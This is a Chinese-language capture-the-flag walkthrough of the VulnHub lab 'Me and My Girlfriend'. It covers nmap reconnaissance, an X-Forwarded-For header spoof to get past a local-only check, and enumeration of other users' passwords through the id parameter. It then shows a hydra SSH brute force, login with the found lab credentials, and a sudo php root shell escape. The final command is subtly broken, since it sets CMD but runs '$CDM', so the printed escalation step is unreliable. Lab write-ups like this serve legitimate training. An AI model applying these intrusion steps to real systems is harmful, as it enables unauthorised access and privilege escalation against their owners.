vulnhub Me and My Girlfriend靶场
目录[*]1.信息收集
[*]2.漏洞挖掘
[*]3.漏洞利用
[*]4.提升权限
1.信息收集
扫描存活主机
sudo arp-scan -l
https://s2.loli.net/2023/12/20/FDWq4IdmrVBJnGg.png
扫描主机的开放端口
nmap -p- 192.168.42.156
https://s2.loli.net/2023/12/20/yhJ2uqQCAL4rFR9.png
扫描端口具体开放服务
nmap -p 22,80 -A -sV 192.168.42.156
https://s2.loli.net/2023/12/20/8A4FtKfJGWkIXDN.png
扫描网站指纹
whatweb 192.168.42.156
https://s2.loli.net/2023/12/20/26NIboALRsZmWO1.png
2.漏洞挖掘
访问网站
https://s2.loli.net/2023/12/20/mlJfsivKRjUAZp2.png
F12,查看html
https://s2.loli.net/2023/12/20/M4lp7hGLz8xg52Z.png
burp抓包
添加X-Forwarded-For:127.0.0.1
https://s2.loli.net/2023/12/20/TlOzFKwabodpkHu.png
访问成功(因为他要本地访问所以每一个包都要加X-Forwarded-For:127.0.0.1)
开始逛街
https://s2.loli.net/2023/12/20/fevtcBEHgWqbN1Y.png
发现登录框(弱密码不行)
https://s2.loli.net/2023/12/20/kQFGjrXbia1RzuC.png
register注册一个,发现id=12,改id找找其他的账号密码
https://s2.loli.net/2023/12/20/MK241TZ7DwbFLRr.png
3.漏洞利用
id=1,找到一个账号,继续
https://s2.loli.net/2023/12/20/3TRymaFtUANK1cL.png
找到的账号密码写在两个文件中
https://s2.loli.net/2023/12/20/cyF3oRZqpsJ7WTr.png
有了账号密码,有22端口,ssh开始爆破
hydra -L 1.txt -P 2.txt ssh://192.168.42.156:22
https://s2.loli.net/2023/12/20/FhJEcqpIjdvg8Ci.png
找到账号
alice
4lic3
登录 ssh alice@192.168.42.156 -p 22
ls -a 查看文件,找到flag1
https://s2.loli.net/2023/12/20/ceVZqYo8tjl6J1H.png
4.提升权限
常规查看
sudo -l
发现该账户有root(php)命令
https://s2.loli.net/2023/12/20/xnWi5Z1lB8FkPmI.png
在网站上查找php提权
https://gtfobins.github.io/
https://s2.loli.net/2023/12/20/EJ8gyzAfvLSscHN.png
复制命令,执行命令
CMD="/bin/sh"
sudo php -r "system('$CDM')"
发现root成功
https://s2.loli.net/2023/12/20/YPGmHpbB59otcAz.png
得到flag2.txt
cat flag2.txt
https://s2.loli.net/2023/12/20/ESaWXfoDq8ipTwJ.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]